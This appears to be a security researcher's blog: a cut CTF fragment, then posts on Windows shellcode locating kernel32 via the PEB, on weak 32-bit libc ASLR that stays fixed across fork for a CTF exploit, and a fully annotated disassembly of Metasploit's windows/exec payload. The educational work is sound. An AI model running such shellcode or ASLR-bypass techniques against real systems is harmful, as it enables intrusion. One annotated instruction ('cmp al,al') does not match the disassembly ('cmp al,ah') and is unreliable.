d47eafe3f5ae42e0498ed7769900004c  file5.exe
$ shasum *
6cd2d31da99b59bc8b94b04d85d0868dc76e7bd0  file1.exe
245a24f647eb5d8fa6e5ff360e42b6f8f3692cfa  file2.exe
1ae718a4a1b8f9906068dd315473aa41927bfe99  file3.exe
0a1c867cf62c35d4283675599d445e29e584c94f  file4.exe
143f0838c8ed0e3800551ad66e01cb1855afa2f3  file5.exe
$ for file in *; do echo "$file: "$(wine $file); done
file1.exe: All Eindbazen are wearing wooden shoes
file2.exe: All Eindbazen live in a windmill
file3.exe: All Eindbazen grow their own tulips
file4.exe: All Eindbazen smoke weed all day
file5.exe: All Eindbazen are cheap bastards
$
You can download my files here.

Monday, July 1, 2013

Understanding Windows shellcode

I learned something new today.

For some time I have tried to understand Skapes paper on Windows shellcode with some success. I had trouble with the finding kernel32.dll using PEB technique and here is why.

The code is this (without Windows 9x version):

push esi
xor  eax, eax
mov  eax, fs:[eax + 0x30] ;Get address of TIB
mov  eax, [eax + 0x0c]    ;Get address of LDR
mov  esi, [eax + 0x1c]    ;Get address of first loaded module descriptor
lodsd                     ;Get address of next loaded module descriptor
mov  eax, [eax + 0x8]     ;Get base address of module (kernel32.dll)
pop  esi
ret

Easy, right ?
Wrong...not if you follow MSDN documentation.

If you google 'PEB_LDR_DATA' the first link you get is http://msdn.microsoft.com/en-us/library/windows/desktop/aa813708(v=vs.85).aspx

So according to Skapes shellcode the addres of the first module descriptor is 0x1c (28) bytes into that structure. But according to MSDN the structure is exactly 28 bytes long...which is a damn lie!

I asked on a SecurtyFocus mailing list called security-basics and got a reply that the MSDN information was wrong!

An accurate definition can be found at undocumented.ntinternals.net.

I drew an illustration (I like visualizing data structures) which helps when following the code:


The FS register points to the Thread Information Block and from there on you can follow the pointer at offset 0x30 to the PEB. Then at offset 0x0c you find a pointer to the PEB loader data.
At offset 0x1c you find the linked list of loaded modules in initialization order. Note that the forward link points INSIDE the LDR module structure and NOT to the base address of the structure. This means that at address zero relative to that forward link you find the next forward link to the kernel32 module structure...still an address inside the structure.
Eight bytes past that you find a pointer to the base address of kernel32.dll.

Tadaaa!!

Monday, April 8, 2013

ASLR and mapped libraries

I learned something new recently.

While working on an exploit for a challenge ('postit-hardened' at http://treasure.pwnies.dk/), I had to find out how libc was mapped in an ASLR environment and I were pleasantly surprised (from an attackers viewpoint).

The service is running in a 32 bit environment, so I started by gathering statistics on how well libc was randomized. I did that with the following C program:

#include <stdio.h>
#include <string.h>

long libc_mapping() {
    long address = 0;
    char buffer[1024] = {0};
    FILE * f = fopen("/proc/self/maps", "r");
    if (f) {
        while (fgets(buffer, sizeof(buffer) - 1, f)) {
            if (strstr(buffer, "libc") && strstr(buffer, "r-xp")) {
                sscanf(buffer, "%lx", &address);
                break;
            }
        }
        fclose(f);
    }
    return address;
}

int main(int argc, char const *argv[]) {
    printf("%ld", libc_mapping());
    return 0;
}
It simply looks up the address where libc is loaded for itself by looking into '/proc/self/maps'. We are interested in the executable mapping.

Together with this shell script we can get some statistics:
#!/bin/bash

comp_addr=0
aslr_bitmap=0

while true; do
    addr=$(./libc_addr)
    if [ "${comp_addr}" == "0" ]; then
        comp_addr=${addr}
    else
        diff=$((comp_addr^addr))
        aslr_bitmap=$((aslr_bitmap|diff))
        printf "%x\n" $aslr_bitmap
    fi
done

It runs the program repeatedly and finds a bitwise difference between the current mapping and the first mapping. Then it writes out all changed bits.

Runing this for a short while we get this mask on my Ubuntu machine: 3ff000

This means that only 10 bits are randomized giving us 1024 possible locations for libc. That is very brute forcable!

Just for fun I tried the same with 64 bits and got this mask: 1fffffff000
That is 29 bits which is more than 500 million possible locations. Much better (from a defender viewpoint).

BUT! Another thing...the service used fork to spawn a new process to handle our connection. How is libc randomized when the process is forked?

Lets see.

I modified the program to fork out and write the address of libc mapped into the child:

#include <stdio.h>
#include <string.h>
#include <unistd.h>

long libc_mapping() {
    long address = 0;
    char buffer[1024] = {0};
    FILE * f = fopen("/proc/self/maps", "r");
    if (f) {
        while (fgets(buffer, sizeof(buffer) - 1, f)) {
            if (strstr(buffer, "libc") && strstr(buffer, "r-xp")) {
                sscanf(buffer, "%lx", &address);
                break;
            }
        }
        fclose(f);
    }
    return address;
}

int main(int argc, char const *argv[]) {
    pid_t pid;
    int i, status;

    printf("Parent: %lx\n", libc_mapping());

    for (i = 1; i <= 10; i++) {
        pid = fork();
        if (pid) {
            waitpid(pid, &status, 0);
        } else {
            printf("Child %d: %lx\n", i, libc_mapping());
            return;
        }
    }

    return 0;
}


This is a sample run:
$ ./forked_libc_addr
Parent: f758a000
Child 1: f758a000
Child 2: f758a000
Child 3: f758a000
Child 4: f758a000
Child 5: f758a000
Child 6: f758a000
Child 7: f758a000
Child 8: f758a000
Child 9: f758a000
Child 10: f758a000

Again I tried the same on a 64 bit machine with the same result:
$ ./forked_libc_addr
Parent: 7f1953193000
Child 1: 7f1953193000
Child 2: 7f1953193000
Child 3: 7f1953193000
Child 4: 7f1953193000
Child 5: 7f1953193000
Child 6: 7f1953193000
Child 7: 7f1953193000
Child 8: 7f1953193000
Child 9: 7f1953193000
Child 10: 7f1953193000
So...when forking libc (and all other mappings) stay.

This makes perfect sense when you think about it. The process is cloned, all memory must be intact. How should the operating system know, if your program have pointers into libc which needs updating?

It cannot, so libraries must stay. This is very interesting especially for my exploit since the program has an info leak vulnerability (as well as some others) but when I have received the info the connection is cut. So I have to make a new connection.

But since the info I want is the location of libc this apparently is not a problem because the info is still valid.

WIN!!!

Tuesday, November 13, 2012

Understanding Windows shellcode 3

I recently gained some experience with Return Oriented Programming but my first attempt to build a ROP based exploit on my own was a failure at first (read about it here). However in order to solve the problem I had to understand exactly what went wrong and that forced me to read and understand the shellcode I had chosen.

I had chosen windows/exec and putting a breakpoint before it showed me that the decoder was in fact executed and decoded the shellcode. Also, the decoded shellcode was an exact match with the code I encoded. So...on with the reversing.

The first thing to do was to generate a disassembly of the windows/exec shellcode, which I got like this:

$ msfpayload windows/exec CMD=calc R | ndisasm -b 32 -

This is the disassembly in its entirety:

00000000  FC                cld
00000001  E889000000        call dword 0x8f
00000006  60                pushad
00000007  89E5              mov ebp,esp
00000009  31D2              xor edx,edx
0000000B  648B5230          mov edx,[fs:edx+0x30]
0000000F  8B520C            mov edx,[edx+0xc]
00000012  8B5214            mov edx,[edx+0x14]
00000015  8B7228            mov esi,[edx+0x28]
00000018  0FB74A26          movzx ecx,word [edx+0x26]
0000001C  31FF              xor edi,edi
0000001E  31C0              xor eax,eax
00000020  AC                lodsb
00000021  3C61              cmp al,0x61
00000023  7C02              jl 0x27
00000025  2C20              sub al,0x20
00000027  C1CF0D            ror edi,0xd
0000002A  01C7              add edi,eax
0000002C  E2F0              loop 0x1e
0000002E  52                push edx
0000002F  57                push edi
00000030  8B5210            mov edx,[edx+0x10]
00000033  8B423C            mov eax,[edx+0x3c]
00000036  01D0              add eax,edx
00000038  8B4078            mov eax,[eax+0x78]
0000003B  85C0              test eax,eax
0000003D  744A              jz 0x89
0000003F  01D0              add eax,edx
00000041  50                push eax
00000042  8B4818            mov ecx,[eax+0x18]
00000045  8B5820            mov ebx,[eax+0x20]
00000048  01D3              add ebx,edx
0000004A  E33C              jecxz 0x88
0000004C  49                dec ecx
0000004D  8B348B            mov esi,[ebx+ecx*4]
00000050  01D6              add esi,edx
00000052  31FF              xor edi,edi
00000054  31C0              xor eax,eax
00000056  AC                lodsb
00000057  C1CF0D            ror edi,0xd
0000005A  01C7              add edi,eax
0000005C  38E0              cmp al,ah
0000005E  75F4              jnz 0x54
00000060  037DF8            add edi,[ebp-0x8]
00000063  3B7D24            cmp edi,[ebp+0x24]
00000066  75E2              jnz 0x4a
00000068  58                pop eax
00000069  8B5824            mov ebx,[eax+0x24]
0000006C  01D3              add ebx,edx
0000006E  668B0C4B          mov cx,[ebx+ecx*2]
00000072  8B581C            mov ebx,[eax+0x1c]
00000075  01D3              add ebx,edx
00000077  8B048B            mov eax,[ebx+ecx*4]
0000007A  01D0              add eax,edx
0000007C  89442424          mov [esp+0x24],eax
00000080  5B                pop ebx
00000081  5B                pop ebx
00000082  61                popad
00000083  59                pop ecx
00000084  5A                pop edx
00000085  51                push ecx
00000086  FFE0              jmp eax
00000088  58                pop eax
00000089  5F                pop edi
0000008A  5A                pop edx
0000008B  8B12              mov edx,[edx]
0000008D  EB86              jmp short 0x15
0000008F  5D                pop ebp
00000090  6A01              push byte +0x1
00000092  8D85B9000000      lea eax,[ebp+0xb9]
00000098  50                push eax
00000099  68318B6F87        push dword 0x876f8b31
0000009E  FFD5              call ebp
000000A0  BBF0B5A256        mov ebx,0x56a2b5f0
000000A5  68A695BD9D        push dword 0x9dbd95a6
000000AA  FFD5              call ebp
000000AC  3C06              cmp al,0x6
000000AE  7C0A              jl 0xba
000000B0  80FBE0            cmp bl,0xe0
000000B3  7505              jnz 0xba
000000B5  BB4713726F        mov ebx,0x6f721347
000000BA  6A00              push byte +0x0
000000BC  53                push ebx
000000BD  FFD5              call ebp
000000BF  63616C            arpl [ecx+0x6c],sp
000000C2  6300              arpl [eax],ax

This supposedly executes "calc".

Let's cut it up a little and comment what happens. In my point of view the code consists of three overall stages: Setup, "Magic" function and execution.

Setup

;Make LOD* instructions increment addresses
00000000  FC                cld
;Push EIP onto stack so that we know where we are...then jump to 0x8f
;The value pushed is the address of the instruction following the call.
00000001  E889000000        call dword 0x8f
;..... Here lies the magic function
;Pop the address into EBP so that it contains the address of the magic function
0000008F  5D                pop ebp

Setup is short. The magic function will use LOD* instructions and they should move from low to higher adresses so the direction flag is cleared. Then the code calls past the magic function to a POP EBP so that EBP contains the address of the function.

Now setup is done.

Execution

I will describe the magic function later since it is quite large...for now know that it locates other functions and executes them.

;Push the value 1 onto the stack (this is actually the second argument to WinExec)
00000090  6A01              push byte +0x1
;Load the address of the "calc" string at 0xbf into EAX
00000092  8D85B9000000      lea eax,[ebp+0xb9]
;Push the address of "calc" onto the stack (first argument to WinExec)
00000098  50                push eax
;Push the value 0x876f8b31 onto the stack...this is a hash and will be explained later
00000099  68318B6F87        push dword 0x876f8b31
;Call the function at 0x6...the function will return to the next instruction
0000009E  FFD5              call ebp
;Put the value 0x56a2b5f0 into EBX...also a hash
000000A0  BBF0B5A256        mov ebx,0x56a2b5f0
;Put value 0x9dbd95a6 onto stack...you guessed it, it's a hash
000000A5  68A695BD9D        push dword 0x9dbd95a6
;Call the magic function
000000AA  FFD5              call ebp
;Compare low byte in EAX register to the value 6
000000AC  3C06              cmp al,0x6
;If it is less that 6, go to 0xba and skip the next section which may change the
;hash that was put into EBX at address 0xa0
000000AE  7C0A              jl 0xba
;Compare low part of EBX to 0xe0 (at first this didn't make sense
;as EBX at this point is 0x56a2b5f0 and thus BL is 0xf0 but there is an explanation)
000000B0  80FBE0            cmp bl,0xe0
;If it equals goto 0xba...it will not equal in our example
000000B3  7505              jnz 0xba
;If we got here then change EBX to 0x6f721347
000000B5  BB4713726F        mov ebx,0x6f721347
;Now...put a zero byte on the stack (first argument for ExitProcess)
000000BA  6A00              push byte +0x0
;Push the hash...whatever it is (either 0x56a2b5f0 or 0x6f721347)
000000BC  53                push ebx
;Again...call the magic function
000000BD  FFD5              call ebp 
;Yes...these are not instructions but rather the name of the program to execute 
000000BF  63616C6300        db "calc",0

Pseudocode of the above look something like this:

MagicFunction(HASH(WinExec), "calc", SW_SHOWNORMAL);
DWORD version = MagicFunction(HASH(GetVersion));
if (LOBYTE(LOWORD(version)) >= 6 && (char)hash_of_chosen_exitmethod == 0xa0) {
    /* We are on Windows Vista, Windows 2008, Windows 7 or Windows 8
     * and the penetration tester chose to use ExitThread.
     * Use RtlExitUserThread instead.
     */
    hash_of_chosen_exitmethod = HASH(RtlExitUserThread);
}
MagicFunction(hash_of_chosen_exitmethod, 0);

What does all this mean ?
The magic function (which we will look at in a moment) takes a hash of the function that we want to call combined with a hash of the dll that contains the function, plus any arguments to the function we want to call.

So we start by having it invoke WinExec with "calc" and SW_SHOWNORMAL.
After that we call an exit function. We can override which function should be used by specifying the EXITFUNC option to 'msfpayload'. Valid options are 'process' which corresponds to ExitProcess, 'thread' which corresponds to ExitThread, 'seh' which is SetUnhandledExceptionFilter, and 'none' which will just call GetLastError.

As we can see, the shellcode will not use ExitThread if running on a Windows version higher than XP. In this case RtlExitUserThread will be called instead.

So, now we know what functions will be called. Lets take a look at the magic function to see how this is actually done.

Magic function

The magic function is not actually magic, but it is very clever. It is a sort of hashed linker using Skapes trick for finding a function inside a dll whose name equals a hash, but instead of us having to specify the base address of the dll to search this function will search all loaded dlls for a function matching the hash.
The hash is formed by combining the hash of the dlls name and the functions name. The arguments to the not so magic but clever function is the hash to search for and then the arguments to the function to search for. This may be better explained with pseudo code:

function MagicFunction(long hash, ...) {
    for each loaded dll {
        dll_name_hash = hash(dll.name);
        for each exported symbol {
            symbol_hash = hash(symbol);
            combined_hash = dll_name_hash + symbol_hash;
            if (combined_hash == hash) {
                remove_hash_from_stack;
                put_return_address_on_stack;
                jump(symbol);
            }
        }
    }
}

Something like that. The function removes the hash from the stack and puts the original return address on the stack instead so the jump to the found function will act like a call. When the found function returns it will not return into the FindAndExecute function but to the location where FindAndExecute was called. Very clever. Lets see how this is actually done.

;Preserve all registers, except EAX, ECX and EDX (as we will see in the and
00000006  60                pushad
;Build new stack frame, just like a compiler generated function
00000007  89E5              mov ebp, esp
;Zero out EDX
00000009  31D2              xor edx, edx
;Get pointer to PEB into EDX
;FS register points to TEB: http://www.nirsoft.net/kernel_struct/vista/TEB.html
;FS+0x30 is the PEB: http://www.nirsoft.net/kernel_struct/vista/PEB.html
0000000B  648B5230          mov edx,[fs:edx+0x30]
;Get address of LDR into EDX
;http://www.nirsoft.net/kernel_struct/vista/PEB_LDR_DATA.html
0000000F  8B520C            mov edx,[edx+0xc]
;Get address of InMemoryOrderModuleList list entry into EDX
00000012  8B5214            mov edx,[edx+0x14]

Now EDX points to the first list list entry in memory order. Here begins a loop through all entries in the list.

;We will loop here so we put a label
check_next_dll:
;Get address of base dll name unicode string into ESI
;http://www.nirsoft.net/kernel_struct/vista/LDR_DATA_TABLE_ENTRY.html
;http://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html
00000015  8B7228            mov esi,[edx+0x28]
;Get maximum length of base dll name unicode string into ECX
00000018  0FB74A26          movzx ecx,word [edx+0x26]
;Initialize hash to zero
0000001C  31FF              xor edi,edi

Now ESI points to the dll name in Unicode, ECX contains the maximum length in bytes (number of bytes used for the name plus null terminator) and EDI is zero. EDI will eventually contain the hash.

Now we enter a hashing loop.

load_next_character:
;AL will contain a character but high bits needs to be zeroed
0000001E  31C0              xor eax,eax
;Load next byte from address pointed to by ESI into AL and increment ESI by one
00000020  AC                lodsb
;Compare to 'a'
00000021  3C61              cmp al,'a'
;If less than then the character is already uppercase or punctuation
00000023  7C02              jl upper_case
;Subtract 0x20 to make upper case
00000025  2C20              sub al,0x20
upper_case:
;Update hash in EDI
00000027  C1CF0D            ror edi,0xd
0000002A  01C7              add edi,eax
;If we have more characters in the string...
0000002C  E2F0              loop load_next_character

Now EDI contains the hash of the dll name, and EDX still points to the dll in memory order list entry. Next we will find the current dll export list so that we can iterate through all exported functions.

;Save dll list entry
0000002E  52                push edx
;Save dll name hash
0000002F  57                push edi
;Put current modules base addr in EDX
00000030  8B5210            mov edx,[edx+0x10]
;Put PE header offset into EAX
00000033  8B423C            mov eax,[edx+0x3c]
;Make address absolute
00000036  01D0              add eax,edx
;Put offset of exports into EAX
00000038  8B4078            mov eax,[eax+0x78]
;If offset is zero (meaning no exports?)
0000003B  85C0              test eax,eax
;...then go past the code that looks at the export table
0000003D  744A              jz not_found
;...otherwise make address absolute
0000003F  01D0              add eax,edx
;Save address of exports
00000041  50                push eax
;Put number of exported symbols into ECX
00000042  8B4818            mov ecx,[eax+0x18]
;Put offset of names into EBX
00000045  8B5820            mov ebx,[eax+0x20]
;Make address absolute
00000048  01D3              add ebx,edx

At this point ECX contains the number of exported symbols, EBX points to the first entry in the export list and EDX points to the dll base address. The export entries are offsets to where the name lies in memory.

Next comes a loop over all the exported symbols.

;Here we start a loop that runs over all exported symbols
next_symbol:
;If there are no more exported symbols
0000004A  E33C              jecxz no_more_symbols
;Decrement ECX so that we can use it as an offset into the export list
0000004C  49                dec ecx
;Put offset of name into ESI
0000004D  8B348B            mov esi,[ebx+ecx*4]
;Make absolute
00000050  01D6              add esi,edx
;Initialize EDI to zero. EDI will hold the hash of the name
00000052  31FF              xor edi,edi
;Here starts a loop that hashes the name
next_symbol_char:
;AL will contain next character but higher bits needs zeroing
00000054  31C0              xor eax,eax
;Read next character
00000056  AC                lodsb
;Update hash
00000057  C1CF0D            ror edi,0xd
0000005A  01C7              add edi,eax
;Have we reached the end (zero terminated string)
0000005C  38E0              cmp al,al
;If not, read next character
0000005E  75F4              jnz next_symbol_char
;Hash is complete. Combine dll name (at EBP-8) hash with symbol hash
00000060  037DF8            add edi,[ebp-0x8]
;Compare combined hash to first argument to magic function
00000063  3B7D24            cmp edi,[ebp+0x24]
;If not the same try next symbol
00000066  75E2              jnz next_symbol:

If we get past the JNZ instruction it is because the hash matched. In that case the corresponding function should be executed but first its location needs to be found and the stack must be prepared so that it looks like it was called normally.
At this point the stack looks like this:


The return address is the address of the instruction following the 'CALL EBP' which invoked the magic function. It is the address we want WinExec to return to, so when we have found WinExec we need to remove all the other stuff on the stack and put the return address where the hash is now. Lets see how this happens.

;Restore export table address
00000068  58                pop eax
;Get offset of ordinals into EBX
00000069  8B5824            mov ebx,[eax+0x24]
;Make absolute
0000006C  01D3              add ebx,edx
;Get ordinal of symbol into CX (ordinals are 16 bits)
0000006E  668B0C4B          mov cx,[ebx+ecx*2]
;Offset of function table into EBX
00000072  8B581C            mov ebx,[eax+0x1c]
;Make absolute
00000075  01D3              add ebx,edx
;Put offset of function into EAX
00000077  8B048B            mov eax,[ebx+ecx*4]
;Make absolute
0000007A  01D0              add eax,edx

Now we have the address of the function in EAX. Next we fix the stack.

;Replace PUSHADed EAX
0000007C  89442424          mov [esp+0x24],eax
;Remove top item on stack (address of exports)
00000080  5B                pop ebx
;Remove top item on stack (dll name hash)
00000081  5B                pop ebx
;Restore all registers and remove PUSHADed data
00000082  61                popad
;Get original return address
00000083  59                pop ecx
;Remove hash
00000084  5A                pop edx
;Restore return address
00000085  51                push ecx
;Now simply jump to the function, it will look like it was simply called
00000086  FFE0              jmp eax

The last four instructions do the clever "call" to the found function. WinExec will see the original return address and two arguments, believing it was called normally.
We have now covered the most interesting parts of the magic function but there is still five instructions left to cover. Earlier we jumped to 'no_more_symbols' if the iteration through the symbol table reached the end, or to 'not_found' if no symbol table was found. Those two jumps were to locations past the execution of the found function and they follow here:

;We jump here if we have moved past all symbols in the dll
no_more_symbols:
;Restore address of exports structure
00000088  58                pop eax
;We jump here if no exports table was found
not_found:
;Remove saved dll name hash
00000089  5F                pop edi
;Restore address of current in memory order module list entry
0000008A  5A                pop edx
;Follow linked list to next entry
0000008B  8B12              mov edx,[edx]
;Check next dll
0000008D  EB86              jmp check_next_dll

Now the analysis is complete. One thing to note about this last bit is that the function you look for had better be found. Otherwise the program will certainly crash as there is no check for having reached the last entry in the linked list.

I hope you will agree that this function is not really magic but rather a thing of beauty. It is very generic and thus can be used as a basic building block in all shellcodes. And this is exactly what has happened. If you look in all Windows payloads in Metasploit you will see this function.

After I had reverse engineered the windows/exec shellcode someone told me that I could have read the original assembly source with comments. It is located in 'external/source/shellcode/windows/x86/src/single/single_exec.asm'.

While this is true, I believe that I got more out of doing the hard work myself. When reverse engineering you really have to understand all the details and look up documentation on the different structures that are used. When reading the comments I have a tendency to skip this and just trust the comments.

I hope you enjoyed this as much as I did.